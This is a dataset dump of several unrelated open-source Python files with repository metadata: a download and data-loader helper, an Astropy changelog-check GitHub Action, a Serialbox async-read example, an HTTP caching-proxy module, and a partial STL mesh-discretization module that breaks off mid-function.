return download_from_google_drive(filepath, url)
else:
return download_url(filepath, url)
def download_url(filepath, url):
''' Downloads the given url to the specified file path. '''
filename = os.path.basename(filepath)
with DownloadProgressBar(filename) as progress:
urlretrieve(url, filepath, reporthook=progress.update_to)
return filepath
def download_from_google_drive(filepath, url):
'''
Downloads a file from Google Drive.
Apparently Google Drive may issue a warning about scanning for viruses and require confirmation
to continue the download.
'''
confirmation_token = None
session = requests.Session()
response = session.get(url, stream=True)
for key, value in response.cookies.items():
if key.startswith("download_warning"):
confirmation_token = value
if confirmation_token:
url = url + "&confirm=" + confirmation_token
response = session.get(url, stream=True)
total_size = int(response.headers.get('content-length', 0))
block_size = 16 * 1024
filename = os.path.basename(filepath)
with open(filepath, "wb") as file:
with DownloadProgressBar(filename) as progress:
blocks = iter(
file.write(block)
for block in response.iter_content(block_size)
if block
)
for i, block in enumerate(blocks):
progress.update_to(i, block_size, total_size)
return filepath
def get_dataloader(config, worker_init_fn=None, pin_memory=True, num_devices=1, shuffle=False):
''' Utility function that gets a data loader '''
dataset = config.dataset(config, split=config.split).load()
if config.batch_method == 'token':
# Calculate batch sizes for each device. Potentially reduce the batch size on device 0 as
# the optimization step (all the gradients from all devices) happens on device 0.
batch_sizes = [config.batch_size - config.batch_size_buffer]
batch_sizes += [config.batch_size] * (num_devices - 1)
batch_sampler = SequenceLengthSampler(
batch_sizes,
[(len(d['input']), len(d['target'])) for d in dataset.data],
shuffle=shuffle,
granularity=config.token_bucket_granularity
)
elif config.batch_method == 'example':
sampler_fn = RandomSampler if shuffle else SequentialSampler
batch_sampler = BatchSampler(
sampler_fn(dataset),
config.batch_size,
False
)
else:
raise ValueError('Unknown batch method!')
return DataLoader(
dataset,
batch_sampler=batch_sampler,
collate_fn=partial(dataset.collate, sort=True),
num_workers=num_devices,
pin_memory=pin_memory,
worker_init_fn=worker_init_fn
)
| 33.522727
| 99
| 0.661695
| 820
| 0.185311
| 0
| 0
| 0
| 0
| 0
| 0
| 1,194
| 0.269831
|
7734720921a60ab16b14a023eaab75451a582742
| 3,092
|
py
|
Python
|
check_changelog.py
|
pllim/action-check_astropy_changelog
|
915511a895712098ca250cb3416e2c08ffb1a0fa
|
[
"BSD-3-Clause"
] | null | null | null |
check_changelog.py
|
pllim/action-check_astropy_changelog
|
915511a895712098ca250cb3416e2c08ffb1a0fa
|
[
"BSD-3-Clause"
] | null | null | null |
check_changelog.py
|
pllim/action-check_astropy_changelog
|
915511a895712098ca250cb3416e2c08ffb1a0fa
|
[
"BSD-3-Clause"
] | null | null | null |
import json
import os
import sys
from astropy_changelog import loads
from github import Github
event_name = os.environ['GITHUB_EVENT_NAME']
if event_name not in ('pull_request_target', 'pull_request'):
print(f'No-op for {event_name}')
sys.exit(0)
event_jsonfile = os.environ['GITHUB_EVENT_PATH']
with open(event_jsonfile, encoding='utf-8') as fin:
event = json.load(fin)
pr_labels = [e['name'] for e in event['pull_request']['labels']]
if 'skip-changelog-checks' in pr_labels:
print('Changelog checks manually disabled for this pull request.')
sys.exit(0) # Green but no-op
forkrepo = event['pull_request']['head']['repo']['full_name']
pr_branch = os.environ['GITHUB_HEAD_REF']
g = Github(os.environ.get('GITHUB_TOKEN'))
clog_file = os.environ.get('CHANGELOG_FILENAME', 'CHANGES.rst')
repo = g.get_repo(forkrepo)
try:
contents = repo.get_contents(clog_file, ref=pr_branch)
except Exception:
print('This repository does not appear to have a change log! '
f'(Expecting a file named {clog_file})')
sys.exit(1)
# Parse changelog
changelog = loads(contents.decoded_content.decode('utf-8'))
# Find versions for the pull request we are looking at
pr_num = event['number']
versions = changelog.versions_for_issue(pr_num)
if len(versions) > 1:
print('Change log entry present in multiple version sections '
f'({", ".join(versions)}).')
sys.exit(1)
if len(versions) == 1:
version = versions[0]
if 'no-changelog-entry-needed' in pr_labels:
print(f'Changelog entry present in {version} but '
'**no-changelog-entry-needed** label set.')
sys.exit(1)
if 'Affects-dev' in pr_labels:
print(f'Changelog entry present in {version} but '
'**Affects-dev** label set.')
sys.exit(1)
base_repo = event['pull_request']['base']['repo']['full_name']
repo = g.get_repo(base_repo)
pr = repo.get_pull(pr_num)
if not pr.milestone:
print(f'Cannot check for consistency of change log in {version} since '
'milestone is not set.')
sys.exit(1)
milestone = pr.milestone.title
if milestone.startswith('v'):
milestone = milestone[1:]
if version.startswith('v'):
version = version[1:]
if milestone != version:
print(f'Changelog entry section ({version}) '
f'inconsistent with milestone ({milestone}).')
sys.exit(1)
print(f'Changelog entry consistent with milestone ({milestone}).')
else: # No change log found
if 'Affects-dev' in pr_labels:
print('Changelog entry not present, as expected since the '
'**Affects-dev** label is present.')
elif 'no-changelog-entry-needed' in pr_labels:
print('Changelog entry not present, as expected since the '
'**no-changelog-entry-needed** label is present')
else:
print('Changelog entry not present, (or PR number missing) and '
'neither the **Affects-dev** nor the '
'**no-changelog-entry-needed** label is set.')
sys.exit(1)
| 31.876289
| 79
| 0.654916
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1,460
| 0.472186
|
7734b23f84997ddc3801f990923aea0601af3e94
| 4,037
|
py
|
Python
|
examples/python/example-05-async.py
|
lukasm91/serialbox2
|
3a8dba366ef160df684c957e59c0a5f6b1b17244
|
[
"BSD-2-Clause"
] | 1
|
2020-09-04T00:43:52.000Z
|
2020-09-04T00:43:52.000Z
|
examples/python/example-05-async.py
|
mlange05/serialbox2
|
fa72d8a39f62c7c0b76536680f7a9953957f59f2
|
[
"BSD-2-Clause"
] | null | null | null |
examples/python/example-05-async.py
|
mlange05/serialbox2
|
fa72d8a39f62c7c0b76536680f7a9953957f59f2
|
[
"BSD-2-Clause"
] | null | null | null |
#!/usr/bin/python3
# -*- coding: utf-8 -*-
##===-----------------------------------------------------------------------------*- Python -*-===##
##
## S E R I A L B O X
##
## This file is distributed under terms of BSD license.
## See LICENSE.txt for more information.
##
##===------------------------------------------------------------------------------------------===##
##
## This example demonstrates the asynchronous API of Serialbox which can improve the throughput of
## read operations.
##
##===------------------------------------------------------------------------------------------===##
#
# First, we have to make sure Python finds the Serialbox module. Alternatively, you can also set the
# environment variable PYTHONPATH.
#
import os
import sys
import time
sys.path.append(os.path.dirname(os.path.realpath(__file__)) + '/../python')
sys.path.append(os.path.dirname(os.path.realpath(__file__)) + '/../../src/serialbox-python')
#
# Import Serialbox
#
import serialbox as ser
import numpy as np
def main():
N = 512; M = 512; K = 80
savepoint = ser.Savepoint('sp')
#
# First, we write some data to disk ...
#
serializer_write = ser.Serializer(ser.OpenModeKind.Write, "./async", "Field", "Binary")
field_1 = np.random.rand(N, M, K)
field_2 = np.random.rand(N, M, K)
field_3 = np.random.rand(N, M, K)
field_4 = np.random.rand(N, M, K)
field_5 = np.random.rand(N, M, K)
field_6 = np.random.rand(N, M, K)
serializer_write.write('field_1', savepoint, field_1)
serializer_write.write('field_2', savepoint, field_2)
serializer_write.write('field_3', savepoint, field_3)
serializer_write.write('field_4', savepoint, field_4)
serializer_write.write('field_5', savepoint, field_5)
serializer_write.write('field_6', savepoint, field_6)
#
# ... and read it again.
#
serializer_read = ser.Serializer(ser.OpenModeKind.Read, "./async", "Field", "Binary")
start = time.time()
field_1_rd = serializer_read.read('field_1', savepoint)
field_2_rd = serializer_read.read('field_2', savepoint)
field_3_rd = serializer_read.read('field_3', savepoint)
field_4_rd = serializer_read.read('field_4', savepoint)
field_5_rd = serializer_read.read('field_5', savepoint)
field_6_rd = serializer_read.read('field_6', savepoint)
print("Serializer.read : %8.2f s" % (time.time() - start))
#
# Read operations are usually embarrassingly parallel and we can leverage this parallelism by
# launching the operations asynchronously. If the archive is not thread-safe or if the library
# was not configured with `SERIALBOX_ASYNC_API` the method falls back to synchronous execution.
# To synchronize the tasks in the end, we can add a blocking Serializer.wait_for_all().
#
start = time.time()
field_1_rd_async = serializer_read.read_async('field_1', savepoint)
field_2_rd_async = serializer_read.read_async('field_2', savepoint)
field_3_rd_async = serializer_read.read_async('field_3', savepoint)
field_4_rd_async = serializer_read.read_async('field_4', savepoint)
field_5_rd_async = serializer_read.read_async('field_5', savepoint)
field_6_rd_async = serializer_read.read_async('field_6', savepoint)
serializer_read.wait_for_all()
print("Serializer.read_async : %8.2f s" % (time.time() - start))
#
# Finally, we verify the read operations actually do the same.
#
assert(np.allclose(field_1_rd, field_1_rd_async))
assert(np.allclose(field_2_rd, field_2_rd_async))
assert(np.allclose(field_3_rd, field_3_rd_async))
assert(np.allclose(field_4_rd, field_4_rd_async))
assert(np.allclose(field_5_rd, field_5_rd_async))
assert(np.allclose(field_6_rd, field_6_rd_async))
#
# Remove directory
#
import shutil
shutil.rmtree("./async")
if __name__ == '__main__':
main()
| 36.7
| 102
| 0.626951
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1,676
| 0.41516
|
7734ec4ada3d6545396115d166790d365032b3f9
| 6,793
|
py
|
Python
|
johnny_cache/cache.py
|
Sonictherocketman/cache-proxy
|
75650fb143b365e922c03f87e388c5710ad21799
|
[
"MIT"
] | 3
|
2019-07-23T02:33:04.000Z
|
2021-05-25T16:57:24.000Z
|
johnny_cache/cache.py
|
Sonictherocketman/cache-proxy
|
75650fb143b365e922c03f87e388c5710ad21799
|
[
"MIT"
] | null | null | null |
johnny_cache/cache.py
|
Sonictherocketman/cache-proxy
|
75650fb143b365e922c03f87e388c5710ad21799
|
[
"MIT"
] | null | null | null |
from dataclasses import dataclass
from datetime import datetime, timedelta
import json
import os.path
from dateutil.parser import parse
import pytz
import redis
from redis.lock import LockError
import requests
from . import settings
from .logger import logger
UNCACHED_HEADERS = (
'Age',
'Cache-Control',
'Date',
'X-Cache',
)
def get_cache():
if settings.REDIS_URL:
logger.info('Using Redis Cache.')
return RedisCache(settings.REDIS_URL)
logger.info('Using Local Cache.')
return PersistedCache(
os.path.join(settings.CACHE_LOCATION, settings.CACHE_NAME)
)
class PersistedCache(object):
store = {}
def __init__(self, cache_location):
self.cache_location = cache_location
try:
self.store.update(self.load(cache_location))
except IOError:
logger.warn('No existing cache detected. Will create one.')
except Exception:
logger.error('Could not load cache. Removing and recreating.')
self.save()
finally:
logger.info(f'Cache prepopulated with {len(self.store.keys())} items.')
def get(self, key):
return self.store.get(key, None)
def set(self, key, value):
self.store[key] = value
try:
self.save()
except Exception:
logger.error('Could not load cache. Dumping store and regenerating.')
self.store = {}
self.save()
def save(self):
with open(self.cache_location, 'w+') as f:
json.dump({
key: cache_item.encode()
for key, cache_item in self.store.items()
}, f)
def load(self, cache_location):
with open(cache_location, 'r+') as f:
return {
key: CacheItem.decode(value)
for key, value in json.load(f).items()
}
class RedisCache(object):
def __init__(self, url):
self.ttl = (
settings.MAX_CACHE_SECONDS
if settings.MAX_CACHE_SECONDS > 0
else None
)
self.client = redis.Redis.from_url(url)
logger.info(f'Connected to redis: {url}')
def get(self, key):
value = self.client.get(key)
if not value:
return None
return CacheItem.decode(json.loads(value))
def set(self, key, value):
value = json.dumps(value.encode())
try:
with self.client.lock(f'lock__{key}', blocking_timeout=6, timeout=2):
self.client.set(key, value, ex=self.ttl)
except LockError as e:
logger.error(f'Failed to aquire lock for key {key}\n{e}')
return None
@dataclass
class CacheItem:
""" A record in the cache. """
url: str
headers: dict
etag: str
expires: datetime
last_modified: datetime
created_at: datetime
@property
def is_expired(self):
if settings.MAX_CACHE_SECONDS == 0:
return False
expires = (
self.created_at + timedelta(seconds=settings.MAX_CACHE_SECONDS)
)
return expires < datetime.now(pytz.utc)
@property
def is_valid(self):
logger.debug(
f'Using: {self.url}\n'
f'\tEtag: {self.etag}\n'
f'\tExpires: {self.expires}\n'
f'\tLast-Modified: {self.last_modified}\n'
f'-------------------------------------'
)
if not self.expires and not self.last_modified and not self.etag:
logger.debug('No cache information.')
return False
if self.etag == '-1':
logger.debug(f'Forcing uncached version due to Etag: {self.etag}')
return False
if self.is_expired:
logger.debug('CacheItem has expired.')
return False
if self.expires and self.expires > datetime.now(pytz.utc):
logger.debug('Using cached version due to Expires.')
return True
logger.debug(f'>>> HEAD {self.url}')
try:
head_check = requests.head(
self.url,
timeout=10,
)
head_check.raise_for_status()
except Exception as e:
logger.error(f'>>> HEAD {self.url} failed with error: {e}')
return False
etag = head_check.headers.get('etag', None)
logger.debug(f'Trying ETag... {etag}')
if etag and etag == self.etag:
return True
last_modified = head_check.headers.get('last-modified', None)
logger.debug(f'Trying Last-Modified... {last_modified}')
if (
last_modified
and self.last_modified
and parse(last_modified) <= self.last_modified
):
return True
return False
def encode(self):
return [
self.url,
self.headers,
self.etag,
self.expires.isoformat() if self.expires else None,
self.last_modified.isoformat() if self.last_modified else None,
self.created_at.isoformat(),
]
@classmethod
def decode(cls, value):
url, headers, etag, expires_str, last_modified_str, created_at_str = value
return CacheItem(
url=url,
headers=headers,
etag=etag,
expires=parse(expires_str) if expires_str else None,
last_modified=parse(last_modified_str) if last_modified_str else None,
created_at=parse(created_at_str)
)
# Global Cache
request_cache = get_cache()
# Cache Functions
def check(url):
item = request_cache.get(url)
if item is None:
return None
if not item.is_valid:
return None
return item
def get(url):
return request_cache.get(url)
def add(url, response):
expires = response.headers.get('expires')
last_modified = response.headers.get('last-modified')
etag = response.headers.get('etag')
if etag:
etag = (
etag
.replace('W/', '') # replace weak comparison marker
.replace('"', '') # replace quotes
)
headers = {
key: value
for key, value in dict(response.headers).items()
if key not in UNCACHED_HEADERS
}
request_cache.set(url, CacheItem(
url=url,
headers=headers,
etag=etag,
expires=parse(expires) if expires else None,
last_modified=parse(last_modified) if last_modified else None,
created_at=datetime.now(pytz.utc),
))
logger.debug(
f'Adding: {url}\n'
f'\tEtag: {etag}\n'
f'\tExpires: {expires}\n'
f'\tLast-Modified: {last_modified}\n'
f'-------------------------------------'
)
| 26.02682
| 83
| 0.568968
| 4,917
| 0.723833
| 0
| 0
| 2,848
| 0.419255
| 0
| 0
| 1,117
| 0.164434
|
77356d7dc5fcffe3a5f270ff80863770415d901d
| 25,609
|
py
|
Python
|
discretizer.py
|
WeiXuanChan/PIMRMeshfree
|
1011dc86e7363a53a13353db8e61dca31cc07350
|
[
"MIT"
] | null | null | null |
discretizer.py
|
WeiXuanChan/PIMRMeshfree
|
1011dc86e7363a53a13353db8e61dca31cc07350
|
[
"MIT"
] | null | null | null |
discretizer.py
|
WeiXuanChan/PIMRMeshfree
|
1011dc86e7363a53a13353db8e61dca31cc07350
|
[
"MIT"
] | 1
|
2017-05-17T09:16:24.000Z
|
2017-05-17T09:16:24.000Z
|
'''
File: discretizer.py
Description: function definition
History:
Date Programmer SAR# - Description
---------- ---------- ----------------------------
Author: w. x. chan 29Apr2016 - Created
'''
import numpy as np
from . import pinm as pinm
from stl import mesh
from mpl_toolkits import mplot3d
from matplotlib import pyplot
from matplotlib import colors as Colors
from matplotlib.widgets import Button
import matplotlib.cm as cmx
def stlImport(filePath,coords):
# Create a new plot
figure = pyplot.figure()
pyplot.subplots_adjust(bottom=0.2)
axes = mplot3d.Axes3D(figure)
# Load the STL files and add the vectors to the plot
modelMesh = mesh.Mesh.from_file(filePath)
indexedTri=[]
for n in range(len(modelMesh.vectors)):
indexedTri.append(mplot3d.art3d.Poly3DCollection([modelMesh.vectors[n]],facecolors='b'))
axes.add_collection3d(indexedTri[n])
indexedTri[0].set_facecolor('k')
scale = modelMesh.points.flatten(-1)
axes.auto_scale_xyz(scale, scale, scale)
callback = DomainSelector(indexedTri)
axprev = pyplot.axes([0.7, 0.05, 0.1, 0.075])
axnext = pyplot.axes([0.81, 0.05, 0.1, 0.075])
axselect = pyplot.axes([0.05, 0.05, 0.15, 0.075])
axaddToDomain = pyplot.axes([0.05, 0.85, 0.15, 0.075])
axswapSelected = pyplot.axes([0.8, 0.85, 0.15, 0.075])
bnext = Button(axnext, 'Next')
bnext.on_clicked(callback.next)
bprev = Button(axprev, 'Previous')
bprev.on_clicked(callback.prev)
bselect = Button(axselect, '(un)Select')
bselect.on_clicked(callback.select)
baddToDomain = Button(axaddToDomain, 'Add Domain')
baddToDomain.on_clicked(callback.addToDomain)
bswapSelected = Button(axswapSelected, 'Swap Selected')
bswapSelected.on_clicked(callback.swapSelected)
# Show the plot to the screen
#pyplot.connect('key_press_event', callback.keyPressed)
pyplot.show()
maindomain=pinm.Domain('')
subdomain=[]
for domainNumber in range(callback.domainCount):
subdomain.append(pinm.Domain(''))
maindomain.addNode(subdomain[domainNumber])
normalVector=[]
vertices=[]
minvert={}
maxvert={}
for n in range(len(modelMesh.normals)):
normalVector.append({})
vertices.append([])
for keyIndex in range(len(coords)):
normalVector[n][coords[keyIndex]]=modelMesh.normals[n][keyIndex]
for m in range(3):
temp_vert={}
for keyIndex in range(len(coords)):
if coords[keyIndex] not in minvert:
minvert[coords[keyIndex]]=modelMesh.vectors[n][m][keyIndex]
else:
minvert[coords[keyIndex]]=min(minvert[coords[keyIndex]],modelMesh.vectors[n][m][keyIndex])
if coords[keyIndex] not in maxvert:
maxvert[coords[keyIndex]]=modelMesh.vectors[n][m][keyIndex]
else:
maxvert[coords[keyIndex]]=max(maxvert[coords[keyIndex]],modelMesh.vectors[n][m][keyIndex])
temp_vert[coords[keyIndex]]=modelMesh.vectors[n][m][keyIndex]
vertices[n].append(temp_vert)
domainVertices=[]
for n in range(8):
temp_domainVertices={}
for key in range(len(coords)):
if (key==0 and (n in [1,2,5,6])) or (key==1 and (n in [2,3,6,7])) or (key==2 and (n in [4,5,6,7])):
temp_domainVertices[coords[key]]=maxvert[coords[key]]
else:
temp_domainVertices[coords[key]]=minvert[coords[key]]
domainVertices.append(temp_domainVertices)
for n in range(len(callback.domainInfo)):
temp_sub2domain=pinm.Domain('',norm=normalVector[n])
temp_sub2domain.setCentroid(vertices[n])
subdomain[callback.domainInfo[n]].addNode(temp_sub2domain)
maindomain.setCentroid(domainVertices)
return (maindomain,subdomain)
def createMainDomain(minvert,maxvert,coords):
maindomain=pinm.Domain('')
domainVertices=[]
for n in range(8):
temp_domainVertices={}
for key in range(len(coords)):
if (key==0 and (n in [1,2,5,6])) or (key==1 and (n in [2,3,6,7])) or (key==2 and (n in [4,5,6,7])):
temp_domainVertices[coords[key]]=maxvert[coords[key]]
else:
temp_domainVertices[coords[key]]=minvert[coords[key]]
domainVertices.append(temp_domainVertices)
maindomain.setCentroid(domainVertices)
return maindomain
def filterNodes(domainList,nodalDistribution,closeness=0.2): #first in list is prioritized to keep
nodes=[]
for domain in domainList:
for node in domain.nodes():
nodes.append(node)
for n in range(len(nodes)):
if nodes[n].domain!=None:
nodalSpacing=nodalDistribution(nodes[n].pos)
closeNodalSpacing=multiplyDictionary(nodalSpacing,closeness)
linkedNodes=findNodes(nodes[n].pos,domainList,distance=closeNodalSpacing,searchDepth=-1.)
for temp_linkNode in linkedNodes:
if temp_linkNode is not nodes[n]:
temp_domain=temp_linkNode.domain
temp_domain.removeNode(temp_linkNode)
temp_linkNode.domain=None
while len(temp_domain.subDomain)==0:
if temp_domain.superDomain==None:
break
else:
temp2_domain=temp_domain.superDomain
temp2_domain.removeNode(temp_domain)
temp_domain=temp2_domain
return;
def secondaryLinkNode(targetNode,primarylinkIdentifier,secondarylinkIdentifier='secondary'):
nodes=[]
targetNode.addLink(secondarylinkIdentifier,targetNode)
for node in targetNode.link[primarylinkIdentifier]:
for temp_node in node.link[primarylinkIdentifier]:
targetNode.addLink(secondarylinkIdentifier,node)
return;
def primaryLinkNodes(domainList,nodalDistribution,linkIdentifier='primary',closeness=1.5):#influence is function with dictionary input and output
nodes=[]
for domain in domainList:
for node in domain.nodes():
nodes.append(node)
for n in range(len(nodes)):
nodalSpacing=nodalDistribution(nodes[n].pos)
expandedNodalSpacing=multiplyDictionary(nodalSpacing,closeness)
linkedNodes=findNodes(nodes[n].pos,domainList,distance=expandedNodalSpacing,searchDepth=-1.)
addNodesToLink=[]
for temp_linkNode in linkedNodes:
if temp_linkNode is not nodes[n]:
addNodesToLink.append(temp_linkNode)
addNodesToLink.insert(0,nodes[n])
nodes[n].addLink(linkIdentifier,addNodesToLink)
return;
def duplicateNode(coordinateIdentifier,value,nodePorting,newNodes,domainList,targetDomain):
nodeInDomain=[]
for domain in domainList:
if type(domain) is pinm.Node:
new_pos=node.pos.copy()
new_pos[coordinateIdentifier]=value
newNode=pinm.Node(new_pos)
tempCopy=domain.variable.copy()
for key in tempCopy:
newNode.addvariable(key,tempCopy[key])
newNode.addLink('copied from',domain)
tempCopy=node.linkBasis.copy()
for key in tempCopy:
newNode.setLinkBasis(key,tempCopy[key])
newNode.setNorm(node.norm.copy())
newNode.setNormLink(node.normLink)
for n in range(len(node.material)):
newNode.addMaterial(n,node.material[n])
tempCopy=node.variableLink.copy()
for key in tempCopy:
newNode.setVariableLink(key,tempCopy[key])
nodePorting[domain]=newNode
newNodes.append(newNode)
nodeInDomain.append(newNode)
else:
newDomain=pinm.Domain('')
newDomain.pos=domain.pos.copy()
newDomain.maxDistance=domain.maxDistance.copy()
newDomain.pos[coordinateIdentifier]=value
newDomain.maxDistance[coordinateIdentifier]=0.
nodeInDomain.append(newDomain)
duplicateNode(coordinateIdentifier,value,nodePorting,newNodes,domain.subDomain,newDomain)
targetDomain.addNode(nodeInDomain)
return nodeInDomain
def extrudeDimension(domainList,coordinateIdentifier,valueList,prevLinkIdentifier='',nextLinkIdentifier=''):
newDomain=[]
prevNodes=[]
for m in range(len(valueList)):
newNodes=[]
nodePorting={}
newDomain.append([])
for domain in domainList:
tempDomain=pinm.Domain('')
tempDomain.pos=domain.pos.copy()
tempDomain.maxDistance=domain.maxDistance.copy()
tempDomain.pos[coordinateIdentifier]=value
tempDomain.maxDistance[coordinateIdentifier]=0.
newDomain[-1].append(tempDomain)
duplicateNode(coordinateIdentifier,value,nodePorting,newNodes,domain.subDomain,tempDomain)
for new_node in newNodes:
for temp_linkIdentifier in new_node.link['copied from'][0].link:
if temp_linkIdentifier!='copied from':
tempList=[]
for linkNode in new_node.link['copied from'][0].link[temp_linkIdentifier]:
tempList.append(nodePorting[linkNode])
new_node.addLink(temp_linkIdentifier,tempList)
if (prevLinkIdentifier!='' or nextLinkIdentifier!='') and len(prevNodes)!=0:
for n in range(len(newNodes)):
if prevLinkIdentifier!='':
prevNodes[n].addLink(linkIdentifier,newNodes[n])
if nextLinkIdentifier!='':
newNodes[n].addLink(linkIdentifier,prevNodes[n])
prevNodes=newNodes[:]
return newDomain
def arrangeExtrudeDimension(domainList,coordinateIdentifier,valueList,prevLinkIdentifier='',nextLinkIdentifier='',newDomainNameAddOn=' new',firstDomainNameAddOn='',lastDomainNameAddOn=''):
nameList=[]
for domain in domainList:
nameList.append(domain.name)
subDomain=extrudeDimension(domainList,coordinateIdentifier,valueList,prevLinkIdentifier=prevLinkIdentifier,nextLinkIdentifier=nextLinkIdentifier)
newDomain=[]
startDomain=[]
endDomain=[]
for n in range(len(subDomain[0])):
startCount=0
endCountReduce=0
if firstDomainNameAddOn!='':
if firstDomainNameAddOn!=lastDomainNameAddOn:
subDomain[0][n].setDomainName(nameList[n]+firstDomainNameAddOn)
startDomain.append(subDomain[0][n])
startCount=1
if lastDomainNameAddOn!='':
if firstDomainNameAddOn!=lastDomainNameAddOn:
subDomain[-1][n].setDomainName(nameList[n]+lastDomainNameAddOn)
else:
domainGroup=pinm.Domain(nameList[n]+firstDomainNameAddOn)
domainGroup.addNode([subDomain[0][n],subDomain[-1][n]])
endDomain.append(subDomain[-1][n])
endCountReduce=1
leftOverDomain=[]
for m in range(startCount,len(subDomain)-endCountReduce):
leftOverDomain.append(subDomain[m][n])
if len(leftOverDomain)!=0:
tempDomain=pinm.Domain(nameList[n]+newDomainNameAddOn)
tempDomain.addNode(leftOverDomain)
newDomain.append(tempDomain)
return (newDomain,startDomain,endDomain)
def meshSurfaceDomainTriangle(subDomain,nodalDistribution):
for domain in subDomain:
for sub2domain in domain.subDomain:
toBeFurtherMeshed=meshTriangleSpliting(sub2domain,nodalDistribution)
while len(toBeFurtherMeshed)>0:
copy_toBeFurtherMeshed=toBeFurtherMeshed
toBeFurtherMeshed=[]
for new_domain in copy_toBeFurtherMeshed:
for temp_domain in meshTriangleSpliting(new_domain,nodalDistribution):
toBeFurtherMeshed.append(temp_domain)
return;
def meshMainDomain(mainDomain,boundaryDomainList,nodalDistribution,meshOuterNode=False):
innerNodesDomain=pinm.Domain('')
innerNodesDomain.setCentroid(mainDomain.vertices)
mainDomain.addNode(innerNodesDomain)
toBeFurtherMeshed=meshVolume(innerNodesDomain,boundaryDomainList,nodalDistribution,meshOuter=meshOuterNode)
while len(toBeFurtherMeshed)>0:
copy_toBeFurtherMeshed=toBeFurtherMeshed
toBeFurtherMeshed=[]
for new_domain in copy_toBeFurtherMeshed:
for temp_domain in meshVolume(new_domain,boundaryDomainList,nodalDistribution,meshOuter=meshOuterNode):
toBeFurtherMeshed.append(temp_domain)
return innerNodesDomain
def meshTriangleSpliting(domain,nodalDistribution): #nodalDistribution is a function with both i/o dictionary objects
toBeFurtherMeshed=[]
subDomain=[]
#check for odd triangle
sidelength=[0.,0.,0.]
maxSideLength=0.
minSideLength=float('inf')
maxSideIndex=-1
minSideIndex=-1
for n in range(len(domain.vertices)):
for coord in domain.vertices[0]:
sidelength[n]+=(domain.vertices[n][coord]-domain.vertices[n-1][coord])**2.
sidelength[n]=np.sqrt(sidelength[n])
if sidelength[n]>maxSideLength:
maxSideLength=sidelength[n]
maxSideIndex=n
if sidelength[n]<minSideLength:
minSideLength=sidelength[n]
minSideIndex=n
NodeSpacing=nodalDistribution(domain.pos)
newPoint=multiplyDictionary(addDictionary([domain.vertices[maxSideIndex],domain.vertices[maxSideIndex-1]]),0.5)
tri1Domain=pinm.Domain('',norm=domain.normalVector)
tri1Domain.setCentroid([newPoint,domain.vertices[maxSideIndex],domain.vertices[maxSideIndex-2]])
tri2Domain=pinm.Domain('',norm=domain.normalVector)
tri2Domain.setCentroid([newPoint,domain.vertices[maxSideIndex-2],domain.vertices[maxSideIndex-1]])
temp_total=0.
for coord in NodeSpacing:
temp_total+=NodeSpacing[coord]**2.
nodeDis=np.sqrt(temp_total)
if nodeDis<(sum(sidelength)/3.):
subDomain.append(tri1Domain)
subDomain.append(tri2Domain)
toBeFurtherMeshed.append(tri1Domain)
toBeFurtherMeshed.append(tri2Domain)
else:
subDomain.append(pinm.Node(tri1Domain.pos,norm=domain.normalVector))
subDomain.append(pinm.Node(tri2Domain.pos,norm=domain.normalVector))
domain.addNode(subDomain)
return toBeFurtherMeshed
def meshVolume(domain,boundaryDomainList,nodalDistribution,meshOuter=False): #nodalDistribution is a function with both i/o dictionary objects
if meshOuter:
meshOuterCoef=-1.
else:
meshOuterCoef=1.
NodeSpacing=nodalDistribution(domain.pos)
addNodeInstead=1
for coord in domain.maxDistance:
if domain.maxDistance[coord]>NodeSpacing[coord]:
addNodeInstead=0
centerPlane=[]
centerPlaneMidPoints=[]
for n in range(4):
centerPlane.append(multiplyDictionary(addDictionary([domain.vertices[n],domain.vertices[4+n]]),0.5))
for n in range(3):
centerPlaneMidPoints.append(multiplyDictionary(addDictionary([centerPlane[n],centerPlane[n+1]]),0.5))
centerPlaneMidPoints.append(multiplyDictionary(addDictionary([centerPlane[3],centerPlane[0]]),0.5))
planeCentroid=[]
midPoints=[]
for m in range(2):
midPoints.append([])
for n in range(3):
midPoints[m].append(multiplyDictionary(addDictionary([domain.vertices[m*4+n],domain.vertices[m*4+n+1]]),0.5))
midPoints[m].append(multiplyDictionary(addDictionary([domain.vertices[m*4+3],domain.vertices[m*4]]),0.5))
for m in range(2):
planeCentroid.append(multiplyDictionary(addDictionary([midPoints[m][0],midPoints[m][2]]),0.5))
subDomain=[]
toBeFurtherMeshed=[]
for m in range(2):
for n in range(4):
temp_subdomain=pinm.Domain('')
temp_vertices=[midPoints[m][n-1],domain.vertices[4*m+n],midPoints[m][n],planeCentroid[m],
centerPlaneMidPoints[n-1],centerPlane[n],centerPlaneMidPoints[n],domain.pos]
temp_subdomain.setCentroid(temp_vertices)
temp_boundaryNode=findNodes(temp_subdomain.pos,boundaryDomainList)
distancebetween={}
for coord in temp_boundaryNode.pos:
distancebetween[coord]=np.absolute(temp_boundaryNode.pos[coord]-temp_subdomain.pos[coord])
boundaryNodes=findNodes(temp_subdomain.pos,boundaryDomainList,distance=distancebetween)
innerNode=True
for boundaryNode in boundaryNodes:
boundaryNodeCentroid=boundaryNode.pos
boundaryNodeNorm=boundaryNode.norm
dotProduct=0.
normamplitude=0.
for coords in temp_subdomain.pos:
dotProduct+= (temp_subdomain.pos[coords]-boundaryNodeCentroid[coords])*boundaryNodeNorm[coords]
normamplitude+=boundaryNodeNorm[coords]**2.
dotProduct=dotProduct/np.sqrt(normamplitude)
for coords in temp_subdomain.maxDistance:
if (temp_subdomain.maxDistance[coords]*(1-addNodeInstead))<(meshOuterCoef*dotProduct):
innerNode=False
break
if innerNode==False:
break
if innerNode:
if addNodeInstead==1:
temp_node=pinm.Node(temp_subdomain.pos,norm=domain.normalVector)
subDomain.append(temp_node)
else:
toBeFurtherMeshed.append(temp_subdomain)
subDomain.append(temp_subdomain)
domain.addNode(subDomain)
return toBeFurtherMeshed;
def findNodes(position,domainList,distance=None,searchDepth=-1.):#assign search depth to -1 for nodes
temp_searchDepth=searchDepth
if distance==None:
findNearest=True
else:
findNearest=False
if findNearest:
referenceDomain=None
minDistanceSq=float("inf")
otherDomain=[]
for domain in domainList:
temp_distSq=0.
if bool(domain.pos):
for coords in position:
temp_distSq+=(position[coords]-domain.pos[coords])**2.
if minDistanceSq>temp_distSq:
minDistanceSq=temp_distSq
referenceDomain=domain
else:
for allDomain in domain.subDomain:
otherDomain.append(allDomain)
if len(otherDomain)!=0:
if type(referenceDomain) is pinm.Domain:
for includeDomain in referenceDomain.subDomain:
otherDomain.append(includeDomain)
